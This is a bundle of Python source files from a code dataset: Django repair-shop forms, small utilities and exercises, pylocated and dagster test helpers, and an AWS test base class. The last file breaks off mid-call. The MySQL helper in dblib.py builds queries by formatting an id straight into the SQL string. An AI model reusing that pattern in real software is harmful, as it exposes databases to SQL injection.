+{"seq_id":"498501947","text":"from django import forms\nfrom django.forms import ModelForm\nfrom repair.models import Device, ServiceOrder, Person, Enterprise, ServiceRequest, ServicePart, ServiceDevice, ServiceOrder, ServiceAction, ServiceType, ServiceRequestStatusType\nfrom django.core.exceptions import ValidationError\nfrom repair.models import UserAccount\n\nclass ServiceTypeForm(forms.Form):\n\tservice_type = forms.ChoiceField(label='Vali töö tüüp',choices=[(t.service_type, t.type_name) for t in ServiceType.objects.all()])\n\ndef isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\tpass\n\t\t\n\ttry:\n\t\timport unicodedata\n\t\tunicodedata.numeric(s)\n\t\treturn True\n\t\t\n\texcept (TypeError, ValueError):\n\t\tpass\n\t\n\treturn False\n\t\nclass DeviceSelectForm(forms.Form):\n\tdevice_choices = forms.CharField(label='Vali seade')\n\tdef __init__(self, *args, **kwargs):\n\t\torderId = kwargs.pop('id')\n\t\tsuper(DeviceSelectForm, self).__init__(*args, **kwargs)\n\t\tself.fields['device_choices'] = forms.ChoiceField(label='Vali seade', required=False, choices=[('','---------')] + [(d.service_device, d.device_fk.name + \" \" + d.device_fk.reg_no) for d in ServiceDevice.objects.filter(service_order_fk = ServiceOrder.objects.get(pk = orderId))])\n\t\t\nclass OrderPartNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServicePart\n\t\tfields = ['part_name', 'serial_no', 'part_count', 'part_price',]\n\t\tlabels = {\n\t\t\t'part_name': ('Nimi'),\n\t\t\t'serial_no': ('Registreerimisnumber'),\n\t\t\t'part_count': ('Arv'),\n\t\t\t'part_price': ('Hind'),\n }\n\t\t\n\tdef clean_part_price(self):\n\t\tprice = self.cleaned_data.get('part_price')\n\t\tif isNumber(price) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema number.\"\n\t\t\t)\n\t\telif isNumber(price) == True:\n\t\t\tpriceDecimal = float(price)\n\t\t\tif priceDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceDecimal >= 0:\n\t\t\t\tpriceDecimalString = str(priceDecimal)\n\t\t\t\tdecimalPlaces = priceDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn price\n\t\t\n\t\n\tdef clean_part_count(self):\n\t\tcount = self.cleaned_data.get('part_count')\n\t\tregNo = self.cleaned_data.get('serial_no')\n\t\tif regNo != \"\" and count != 1:\n\t\t\traise ValidationError(\n\t\t\t\t\"Kui registreerimisnumber on märgitud, peab ühikute arv olema 1.\"\n\t\t\t)\n\t\treturn count\n\t\t\nclass OrderPartNewPriceDisabledForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServicePart\n\t\tfields = ['part_name', 'serial_no', 'part_count', 'part_price',]\n\t\tlabels = {\n\t\t\t'part_name': ('Nimi'),\n\t\t\t'serial_no': ('Registreerimisnumber'),\n\t\t\t'part_count': ('Arv'),\n\t\t\t'part_price': ('Hind'),\n }\n\t\t\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(OrderPartNewPriceDisabledForm, self).__init__(*args, **kwargs)\n\t\tself.fields['part_price'].widget.attrs['disabled'] = 'disabled'\n\t\t\t\n\t\t\n\t\t\n\t\t\n\n\t\t\n\t\t\n\t\t\n\nclass OrderWorkNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServiceAction\n\t\tfields = ['service_amount', 'price', 'action_description',]\n\t\tlabels = {\n\t\t\t'service_amount': ('Maht'),\n\t\t\t'price': ('Hind'),\n\t\t\t'action_description': ('Kirjeldus'),\n }\n\t\terror_messages = {\n 'service_amount': {\n 'required': (\"See väli on kohustuslik.\"),\n },\n\t\t\t'price': {\n 'required': (\"See väli on kohustuslik.\"),\n },\n }\n\t\t\n\tdef clean_price(self):\n\t\tprice = self.cleaned_data.get('price')\n\t\tif isNumber(price) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(price) == True:\n\t\t\tpriceDecimal = float(price)\n\t\t\tif priceDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceDecimal >= 0:\n\t\t\t\tpriceDecimalString = str(priceDecimal)\n\t\t\t\tdecimalPlaces = priceDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn price\n\t\t\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(OrderWorkNewForm, self).__init__(*args, **kwargs)\n\t\tself.fields['service_amount'].required = True\n\t\tself.fields['price'].required = True\n\t\t\nclass DeviceNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\tfields = ['name', 'model', 'description', 'manufacturer', 'reg_no', 'device_type_fk']\n\t\tlabels = {\n\t\t\t'name': ('Nimi*'),\n\t\t\t'model': ('Mudel*'),\n\t\t\t'description': ('Kommentaar'),\n\t\t\t'manufacturer': ('Tootja*'),\n\t\t\t'reg_no': ('Registreerimisnr.*'),\n\t\t\t'device_type_fk': ('Tüüp*'),\n }\n\t\t\nclass DeviceSearchFormDeviceProperties(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\texclude = ['model', 'description', 'manufacturer', 'reg_no', 'device_type_fk']\n\t\t\nclass RequestsSearchFormByCustomerName(forms.Form):\n\tname = forms.CharField(label='Kliendi nimi', max_length=25,required=False)\n\torder_price_min = forms.CharField(label='Tellimuse hinna alampiir', max_length=25,required=False)\n\torder_price_max = forms.CharField(label='Tellimuse hinna ülempiir', max_length=25,required=False)\n\tdeviceName = forms.CharField(label='Seotud seade', max_length=25,required=False)\n\t\n\tdef clean_order_price_min(self):\n\t\tpriceMin = self.cleaned_data.get('order_price_min')\n\t\tif isNumber(priceMin) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(priceMin) == True:\n\t\t\tpriceMinDecimal = float(priceMin)\n\t\t\tif priceMinDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceMinDecimal >= 0:\n\t\t\t\tpriceMinDecimalString = str(priceMinDecimal)\n\t\t\t\tdecimalPlaces = priceMinDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn priceMin\n\t\n\tdef clean_order_price_max(self):\n\t\tpriceMax = self.cleaned_data.get('order_price_max')\n\t\tif isNumber(priceMax) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(priceMax) == True:\n\t\t\tpriceMaxDecimal = float(priceMax)\n\t\t\tif priceMaxDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne number.\"\n\t\t\t\t)\n\t\t\telif priceMaxDecimal >= 0:\n\t\t\t\tpriceMaxDecimalString = str(priceMaxDecimal)\n\t\t\t\tdecimalPlaces = priceMaxDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn priceMax\n\t\t\nclass ServiceOrderForm(ModelForm):\n\tTYPE_CHOICES = ((1, 'Too vastu voetud',), (2, 'Valmis',), (3, 'Hinnastatud',), (4, 'Arve tehtud',), (5, 'Seade tagastatud',))\n\tso_status_type_fk = forms.ChoiceField(label='Staatus', required=True, widget=forms.Select, choices=TYPE_CHOICES)\n\tclass Meta:\n\t\tmodel = ServiceOrder\n\t\tfields = ['service_order', 'so_status_type_fk', 'note']\n\t\tlabels = {\n\t\t\t'note': ('Märkused'),\n }\n\t\twidgets = {\n\t\t\t'service_order': forms.HiddenInput(),\n\t\t}\n\t\t\nclass PersonForm(ModelForm):\n\tperson_choices = forms.ChoiceField(label='Kliendi nimi',choices=[(p.person, p.first_name + \" \" + p.last_name) for p in Person.objects.all()])\n\tclass Meta:\n\t\tmodel = Person\n\t\tfields = ('person', )\n\t\twidgets = {\n\t\t\t'person_choices': forms.Select(attrs={'class': 'select', 'id': 'person'}),\n\t\t}\n\t\t\nclass EnterpriseForm(ModelForm):\n\tenterprise_choices = forms.ChoiceField(label='Kliendi nimi',choices=[(e.enterprise, e.full_name) for e in Enterprise.objects.all()])\n\tclass Meta:\n\t\tmodel = Enterprise\n\t\tfields = ('enterprise', )\n\t\twidgets = {\n\t\t\t'person_choices': forms.Select(attrs={'class': 'select', 'id': 'enterprise'}),\n\t\t}\n\nclass CustomerTypeChoiceForm(forms.Form):\n\tSUBJECT_TYPE_CHOICES = ((1, 'Eraisikud',), (2, 'Ettevotted',),)\n\tsubject_type = forms.ChoiceField(label='Kliendi tüüp', required=True, widget=forms.RadioSelect(attrs={'class': 'radio', 'id': 'customer_type', 'onclick': 'checkCustomerTwo()'}), choices=SUBJECT_TYPE_CHOICES)\n\t\nclass ServiceRequestForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServiceRequest\n\t\tfields = ['service_desc_by_customer', 'service_desc_by_employee']\n\t\tlabels = {\n\t\t\t'service_desc_by_customer': ('Kliendi kommentaar'),\n\t\t\t'service_desc_by_employee': ('Töötaja kommentaar'),\n }\n\t\t\nclass DevicePresentForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\tfields = ['name', 'manufacturer', 'device_type_fk']\n\t\tlabels = {\n\t\t\t'name': ('Seadme nimi'),\n\t\t\t'manufacturer': ('Tootja'),\n\t\t\t'device_type_fk': ('Seadme tüüp'),\n }\n\t\nclass PersonsSearchForm(forms.Form):\n\tfirst_name = forms.CharField(label='Eesnimi', max_length=25, required = False)\n\tlast_name = forms.CharField(label='Perekonnanimi', max_length=25, required = False)\n\tid_code = forms.CharField(label='Isikukood', max_length=25, required = False)\n\tbirth_year = forms.CharField(label='Sünniaasta', max_length=4, required = False)\n\tdef clean_birth_year(self):\n\t\tyear= self.cleaned_data.get('birth_year')\n\t\tif year != \"\":\n\t\t\tif isNumber(year) == False:\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Aasta peab koosnema numbritest.\"\n\t\t\t\t)\n\t\t\telif isNumber(year) == True:\n\t\t\t\tyearInteger = int(year)\n\t\t\t\tif yearInteger < 0 :\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hind peab olema positiivne.\"\n\t\t\t\t\t)\n\t\treturn year\n\t\t\nclass EnterprisesSearchForm(forms.Form):\n\tfull_name = forms.CharField(label='Ettevõtte nimetus', max_length=25, required = False)\n\t\nclass OrdersSearchForm(forms.Form):\n\tTYPE_CHOICES = ((\"\", '----------',), (1, 'Too vastu voetud',), (2, 'Valmis',), (3, 'Hinnastatud',), (4, 'Arve tehtud',), (5, 'Seade tagastatud',))\n\tcreated_year = forms.CharField(label='Alates aastast', max_length=4, required = False)\n\tso_status_type_fk = forms.ChoiceField(label='Staatus', required=False, widget=forms.Select, choices=TYPE_CHOICES)\n\t\t\n\tdef clean_created_year(self):\n\t\tIntegerValidator(self, 'created_year', 4, 'Aasta', 1)\n\t\t\n\tdef clean_created_month(self):\n\t\tIntegerValidator(self, 'created_month', 2, 'Kuu', 1)\n\t\t\n\tdef clean_created_day(self):\n\t\tIntegerValidator(self, 'created_mday', 2, 'Kuupaev', 1)\n\t\t\ndef IntegerValidator(self, field_name, length, message, minValue):\n\tparam = self.cleaned_data.get(field_name)\n\tif param != \"\":\n\t\tif isNumber(param) == False:\n\t\t\traise ValidationError(\n\t\t\t\tmessage + \" peab koosnema ainult numbritest.\"\n\t\t\t)\n\t\telif isNumber(param) == True:\n\t\t\tparamInteger = int(param)\n\t\t\tif paramInteger < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\tmessage + \" peab olema suurem või võrdne \" + minValue + \".\"\n\t\t\t\t)\n\treturn param\n\t\n\n# class RegisterForm(forms.Form):\n\t# username = forms.CharField(widget=forms.TextInput,label=\"Kasutajanimi\")\n\t# password1 = forms.CharField(widget=forms.PasswordInput,label=\"Salasona\")\n\t# password2 = forms.CharField(widget=forms.PasswordInput,label=\"Salasona(veel kord)\")\n\t# firstName = forms.CharField(label='Eesnimi',widget=forms.TextInput)\n\t# lastName = forms.CharField(label='Perekonnanimi', widget=forms.TextInput)\n\t# iCode = forms.CharField(label='Isikukood', widget=forms.TextInput)\n\t\t\n\t# def clean(self):\n\t\t# cleaned_data = super(RegisterForm, self).clean()\n\t\t# if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:\n\t\t\t# if self.cleaned_data['password1'] != self.cleaned_data['password2']:\n\t\t\t\t# raise forms.ValidationError(\"Sisestatud salasõnad ei lange kokku. Proovi uuesti.\")\n\t\t# return self.cleaned_data\n\t\t\n# class AuthenticationForm(forms.Form):\n\t# username = forms.EmailField(widget=forms.TextInput)\n\t# password = forms.CharField(widget=forms.PasswordInput)\n\t\n\t# class Meta:\n\t\t# model = UserAccount\n\t\t# fields = ['email', 'password']\n\t\t# labels = {\n\t\t\t# 'username': ('Kasutajanimi'),\n\t\t\t# 'password': ('Salasõna'),\n\t\t# }","sub_path":"praktikatoo/mysite/repair/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"19132080","text":"import builtins\nimport hashlib\n\n\nclass open:\n def __init__(self, path, hashvalue, algorithm, mode='t', encoding='utf8'):\n self.path = path\n self.hashvalue = hashvalue\n if isinstance(algorithm, str):\n self._m = hashlib.new(algorithm)\n else:\n self._m = algorithm\n self._isbinary = 'b' in mode\n self._encoding = encoding\n\n def __enter__(self):\n self._f = builtins.open(self.path, 'br')\n return self\n\n def read(self, size=-1):\n b = self._f.read(size)\n self._m.update(b)\n if self._isbinary:\n return b\n else:\n return b.decode(self._encoding)\n\n def __iter__(self):\n return self.read().splitlines().__iter__()\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type is None and self._m.hexdigest() != self.hashvalue:\n raise ValueError('digest mismatch')\n self._f.close()\n\n\ndef read_list(path):\n with builtins.open(path) as f:\n for line in f:\n pos = line.find(' ')\n filehash = line[:pos]\n filepath = line[pos+2:-1]\n yield filehash, filepath\n","sub_path":"hashfiles.py","file_name":"hashfiles.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"371638155","text":"import string\n\ndef str_rev_alpha(s):\n alpha_indices = [ind for ind, char in enumerate(s) \n if char in string.ascii_lowercase]\n l_alpha = len(alpha_indices)\n s = list(s)\n for i in range(l_alpha // 2):\n s[alpha_indices[i]], s[alpha_indices[l_alpha - i - 1]] = s[alpha_indices[l_alpha - i - 1]], s[alpha_indices[i]]\n return ''.join(s) \n\ndef str_rev(s):\n lo, hi = 0, len(s) - 1\n s = list(s)\n while lo < hi:\n if s[lo] not in string.ascii_letters:\n lo += 1\n elif s[hi] not in string.ascii_letters:\n hi -= 1\n else:\n s[lo], s[hi] = s[hi], s[lo]\n lo += 1\n hi -= 1\n return ''.join(s)\n\nif __name__ == '__main__':\n s = input()\n print(s[::-1])\n print(str_rev_alpha(s))\n","sub_path":"Python/Datastructures&Algorithms_Python/string_reverse.py","file_name":"string_reverse.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"599023932","text":"import unittest, os, shutil\nimport logging\nimport getpass\n\nfrom pylocated import locatedb, PyLocatedException\n\nlogging.basicConfig(level=logging.INFO)\n\nlog = logging.getLogger(__name__)\n\n\nclass TestLocate(unittest.TestCase):\n\n\n def test_version(self):\n version = locatedb.version()\n log.info(version)\n self.assertIsNotNone(version)\n\n def test_find(self):\n buffer = locatedb.find('fstab', ignore_case=False, limit=2)\n str_list = buffer.getvalue().split(\"\\n\")\n log.info(str_list)\n self.assertEqual(len(str_list), 2)\n\n def test_find_regex(self):\n buffer = locatedb.find('py', ignore_case=False, regex='.*\\.py')\n str_list = buffer.getvalue().split(\"\\n\")\n self.assertIsNotNone(str_list)\n\n def test_statistics(self):\n file_obj = locatedb.statistics()\n log.info(file_obj.__dict__)\n self.assertIsNotNone(file_obj.directories)\n self.assertIsNotNone(file_obj.files)\n self.assertIsNotNone(file_obj.totalspace)\n self.assertIsNotNone(file_obj.usedspace)\n\n def test_instance_find(self):\n locate_obj = locatedb()\n buffer = locate_obj.find('fstab', ignore_case=False, limit=2)\n str_list = buffer.getvalue().split(\"\\n\")\n log.info(str_list)\n self.assertEqual(len(str_list), 2)\n\n def test_instance_count(self):\n locate_obj = locatedb()\n buffer = locate_obj.count('fstab')\n log.info(buffer)\n self.assertIsNotNone(buffer)\n\nclass TestLocateWithKwArgs(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(TestLocateWithKwArgs, self).__init__(*args, **kwargs)\n self.test_file = '/tmp/db123.db'\n\n def setUp(self):\n if os.path.isfile(self.test_file):\n os.unlink(self.test_file)\n elif os.path.isdir(self.test_file):\n shutil.rmtree(self.test_file)\n else:\n pass\n\n def tearDown(self):\n if os.path.isfile(self.test_file):\n os.unlink(self.test_file)\n\n def create_obj(self):\n locate_obj = locatedb(db_path=self.test_file)\n\n def test_instance_with_dbpath(self):\n if getpass.getuser() == 'root':\n self.create_obj()\n self.assertEqual(os.path.isfile(self.test_file), True, \"instance triggered updatedb\")\n else:\n self.assertRaises(PyLocatedException, self.create_obj)\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"84622907","text":"#!/usr/bin/python\n\nvaleur1 = int(input(\"Entrez une première valeur : \"))\nvaleur2 = int(input(\"Entrez une seconde valeur : \"))\nprint(\"Valeur 1 : {} - Valeur 2 : {}\".format(valeur1, valeur2))\n\nvaleur_temporaire = valeur2\nvaleur2 = valeur1\nvaleur1 = valeur_temporaire\nprint(\"Valeur 1 : {} - Valeur 2 : {}\".format(valeur1, valeur2))\n","sub_path":"exercices/serie1/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"209865067","text":"#! /usr/bin/python\n\nimport os\nfrom autopilot.common.sshutils import SSHClient\nfrom autopilot.common.asyncpool import taskpool\nfrom autopilot.inf.aws.awsinf import AWSInf\nfrom autopilot.inf.aws import awsutils\nfrom autopilot.test.common.aptest import APtest\n\n\nclass AWStest(APtest):\n \"\"\"\n AWS tests base class\n \"\"\"\n def get_aws_inf(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return AWSInf(aws_access_key=aws_access_key,\n aws_secret_key=aws_secret_key)\n\n def delete_vpc_subnets(self, spec=None):\n vpc = self. _get_vpc()\n # disassociate all subnets and subnet related resources\n subnets = spec.get(\"subnets\", [])\n if subnets:\n for subnet in subnets:\n sid = subnet.get(\"subnet_id\")\n raid = subnet.get(\"route_association_id\")\n rtid = subnet.get(\"route_table_id\")\n\n self.log(\"Deleting resources for subnet: {0}\".format(sid))\n if raid:\n self.log(\"Disassociate route {0} for subnet: {1}\".format(raid, sid))\n vpc.conn.disassociate_route_table(association_id=raid)\n if rtid:\n self.log(\"Delete route {0} for subnet: {1}\".format(rtid, sid))\n vpc.conn.delete_route_table(route_table_id=rtid)\n\n self.log(\"Deleting subnet: {0}\".format(sid))\n vpc.conn.delete_subnet(subnet_id=sid)\n\n def terminate_instances_by_ids(self, instance_ids, sgids):\n self.log(\"Terminating instances: {0}\".format(instance_ids))\n ec2 = self._get_ec2()\n instances = ec2.get_all_instances(instance_ids=instance_ids)\n ec2.terminate_instances(instances=instance_ids)\n self.yield_until_instances_in_state(instances=instances, state=\"terminated\")\n self.doyield()\n for sgid in sgids:\n self.log(\"Deleting security group: {0}\".format(sgid))\n ec2.delete_group(group_id=sgid, retry_count=24)\n\n def delete_vpc(self, spec=None):\n vpc = self. _get_vpc()\n\n # disassociate all subnets and subnet related resources\n self.delete_vpc_subnets(spec=spec)\n\n vpc_id = spec.get(\"vpc_id\")\n security_group_id = spec.get(\"security_group_id\", None)\n internet_gateway_id = spec.get(\"internet_gateway_id\", None)\n route_table_id = spec.get(\"route_table_id\", None)\n route_association_id = spec.get(\"route_association_id\", None)\n if security_group_id:\n vpc.conn.delete_security_group(group_id=security_group_id)\n if route_association_id:\n vpc.conn.disassociate_route_table(association_id=route_association_id)\n if route_table_id:\n vpc.conn.delete_route_table(route_table_id=route_table_id)\n if internet_gateway_id:\n vpc.conn.detach_internet_gateway(internet_gateway_id=internet_gateway_id, vpc_id=vpc_id)\n vpc.conn.delete_internet_gateway(internet_gateway_id=internet_gateway_id)\n\n # delete the vpc\n vpc.conn.delete_vpc(vpc_id=vpc_id)\n\n def all_instances_in_state(self, instances, state=\"running\"):\n for instance in instances:\n instance.update()\n # if any instance is pending return True\n if instance.state != state:\n return False\n return True\n\n def yield_until_instances_in_state(self, instances, state=\"running\", timeout=180, interval=10):\n \"\"\"\n Yield until all instances are in a specified state\n \"\"\"\n max_tries = timeout/interval\n attempt = 0\n while attempt < max_tries:\n attempt += 1\n if not self.all_instances_in_state(instances=instances, state=state):\n taskpool.doyield(seconds=interval)\n else:\n return True\n return False\n\n def ssh_command(self, host, command=\"hostname\", username=\"ec2-user\", key_pair=None):\n if not key_pair:\n key_pair = os.environ[\"AP_TEST_AWS_KEY\"]\n\n ssh = SSHClient(host=host, username=username, private_key=key_pair)\n return ssh.execute(command)\n\n def fail_on_errors(self, provision_spec):\n if provision_spec.errors:\n for error in provision_spec.errors:\n self.log(error.message, error=True)\n self.fail(\"Errors. Count: {0}\".format(len(provision_spec.errors)))\n\n def _get_ec2(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return awsutils.EasyEC2(aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key, aws_region_name=\"us-east-1\")\n\n def _get_vpc(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return awsutils.EasyVPC(aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key, aws_region_name=\"us-east-1\")","sub_path":"test/suites/aws/awstest.py","file_name":"awstest.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"302923481","text":"#!/usr/bin/env python\n#-*- coding:UTF-8 -*-\n#=============================================================================\n# FileName: lib.py\n# Desc: \n# Author: linxiao.jz\n# Email: jiaion21@gmail.com\n# Version: 0.1\n# LastChange: 2013-01-10 13:47:36\n# History:\n#=============================================================================\n\n\nimport MySQLdb\nimport datetime\nimport logging\nfrom django.conf import settings \nlogger = logging.getLogger('api-dblib')\n\ndbconf = settings.DATABASES.get('default')\n\nclass dbconnect(object):\n def __init__(self):\n self.conn = MySQLdb.connect(host=dbconf.get('HOST'),\n user=dbconf.get('USER'),\n passwd=dbconf.get('PASSWORD'),\n db=dbconf.get('NAME'),\n port=3306,charset='utf8',use_unicode = True)\n self.cursor = self.conn.cursor()\n def __del__(self):\n self.cursor.close()\n self.conn.close()\n def _exsql(self, sql):\n try :\n self.cursor.execute(sql)\n except MySQLdb.OperationalError:\n logger.info('Retry connect by db')\n self.__init__()\n self.cursor.execute(sql)\n return self.cursor.fetchall()\n def get_termout(self, id):\n sql = '''SELECT pub_hosts.host_termout FROM pub_hosts WHERE id = %s ;''' % id\n allPerson = self._exsql(sql)\n return allPerson\n def get_template(self, id):\n sql = '''SELECT pub_template.temp_name FROM pub_template WHERE temp_name = \"%s\" ;''' % id\n allPerson = self._exsql(sql)\n return allPerson\n\ndbconn = dbconnect()\n","sub_path":"app/api/dblib.py","file_name":"dblib.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"101671300","text":"import itertools\nimport logging\nimport os\nimport tempfile\nimport uuid\n\nfrom collections import defaultdict\nfrom contextlib import contextmanager\n\nfrom dagster import (\n DagsterInvariantViolationError,\n DependencyDefinition,\n ModeDefinition,\n PipelineDefinition,\n SolidInstance,\n check,\n execute_pipeline,\n)\nfrom dagster.core.definitions.logger import LoggerDefinition\nfrom dagster.core.execution.api import RunConfig, scoped_pipeline_context\nfrom dagster.core.execution.context_creation_pipeline import (\n _create_loggers,\n create_environment_config,\n construct_pipeline_execution_context,\n)\nfrom dagster.core.log_manager import DagsterLogManager\nfrom dagster.core.storage.intermediates_manager import InMemoryIntermediatesManager\nfrom dagster.core.storage.runs import InMemoryRunStorage\nfrom dagster.core.utility_solids import define_stub_solid\n\n\ndef create_test_pipeline_execution_context(\n loggers=None, resources=None, tags=None, run_config_loggers=None\n):\n run_id = str(uuid.uuid4())\n loggers = check.opt_dict_param(loggers, 'loggers', key_type=str, value_type=LoggerDefinition)\n mode_def = ModeDefinition(loggers=loggers)\n pipeline_def = PipelineDefinition(\n name='test_legacy_context', solids=[], mode_definitions=[mode_def]\n )\n run_config_loggers = check.opt_list_param(\n run_config_loggers, 'run_config_loggers', of_type=logging.Logger\n )\n run_config = RunConfig(run_id, tags=tags, loggers=run_config_loggers)\n environment_config = create_environment_config(\n pipeline_def, {'loggers': {key: {} for key in loggers}}\n )\n loggers = _create_loggers(environment_config, run_config, pipeline_def, mode_def)\n log_manager = DagsterLogManager(run_config.run_id, {}, loggers)\n\n return construct_pipeline_execution_context(\n run_config=run_config,\n pipeline_def=pipeline_def,\n resources=resources,\n environment_config=environment_config,\n run_storage=InMemoryRunStorage(),\n intermediates_manager=InMemoryIntermediatesManager(),\n log_manager=log_manager,\n )\n\n\ndef _unlink_swallow_errors(path):\n check.str_param(path, 'path')\n try:\n os.unlink(path)\n except: # pylint: disable=W0702\n pass\n\n\n@contextmanager\ndef get_temp_file_name():\n temp_file_name = tempfile.mkstemp()[1]\n try:\n yield temp_file_name\n finally:\n _unlink_swallow_errors(temp_file_name)\n\n\n@contextmanager\ndef get_temp_file_names(number):\n check.int_param(number, 'number')\n\n temp_file_names = list()\n for _ in itertools.repeat(None, number):\n temp_file_name = tempfile.mkstemp()[1]\n temp_file_names.append(temp_file_name)\n\n try:\n yield tuple(temp_file_names)\n finally:\n for temp_file_name in temp_file_names:\n _unlink_swallow_errors(temp_file_name)\n\n\ndef _dep_key_of(solid):\n return SolidInstance(solid.definition.name, solid.name)\n\n\ndef build_pipeline_with_input_stubs(pipeline_def, inputs):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.dict_param(inputs, 'inputs', key_type=str, value_type=dict)\n\n deps = defaultdict(dict)\n for solid_name, dep_dict in pipeline_def.dependencies.items():\n for input_name, dep in dep_dict.items():\n deps[solid_name][input_name] = dep\n\n stub_solid_defs = []\n\n for solid_name, input_dict in inputs.items():\n if not pipeline_def.has_solid_named(solid_name):\n raise DagsterInvariantViolationError(\n (\n 'You are injecting an input value for solid {solid_name} '\n 'into pipeline {pipeline_name} but that solid was not found'\n ).format(solid_name=solid_name, pipeline_name=pipeline_def.name)\n )\n\n solid = pipeline_def.solid_named(solid_name)\n for input_name, input_value in input_dict.items():\n stub_solid_def = define_stub_solid(\n '__stub_{solid_name}_{input_name}'.format(\n solid_name=solid_name, input_name=input_name\n ),\n input_value,\n )\n stub_solid_defs.append(stub_solid_def)\n deps[_dep_key_of(solid)][input_name] = DependencyDefinition(stub_solid_def.name)\n\n return PipelineDefinition(\n name=pipeline_def.name + '_stubbed',\n solids=pipeline_def.solid_defs + stub_solid_defs,\n mode_definitions=pipeline_def.mode_definitions,\n dependencies=deps,\n )\n\n\ndef execute_solids(pipeline_def, solid_names, inputs=None, environment_dict=None, run_config=None):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.list_param(solid_names, 'solid_names', of_type=str)\n inputs = check.opt_dict_param(inputs, 'inputs', key_type=str, value_type=dict)\n environment_dict = check.opt_dict_param(environment_dict, 'environment_dict')\n run_config = check.opt_inst_param(run_config, 'run_config', RunConfig)\n\n sub_pipeline = pipeline_def.build_sub_pipeline(solid_names)\n stubbed_pipeline = build_pipeline_with_input_stubs(sub_pipeline, inputs)\n result = execute_pipeline(stubbed_pipeline, environment_dict, run_config)\n\n return {sr.solid.name: sr for sr in result.solid_result_list}\n\n\ndef execute_solid(pipeline_def, solid_name, inputs=None, environment_dict=None, run_config=None):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.str_param(solid_name, 'solid_name')\n inputs = check.opt_dict_param(inputs, 'inputs', key_type=str)\n environment_dict = check.opt_dict_param(environment_dict, 'environment')\n run_config = check.opt_inst_param(run_config, 'run_config', RunConfig)\n\n return execute_solids(\n pipeline_def,\n [solid_name],\n {solid_name: inputs} if inputs else None,\n 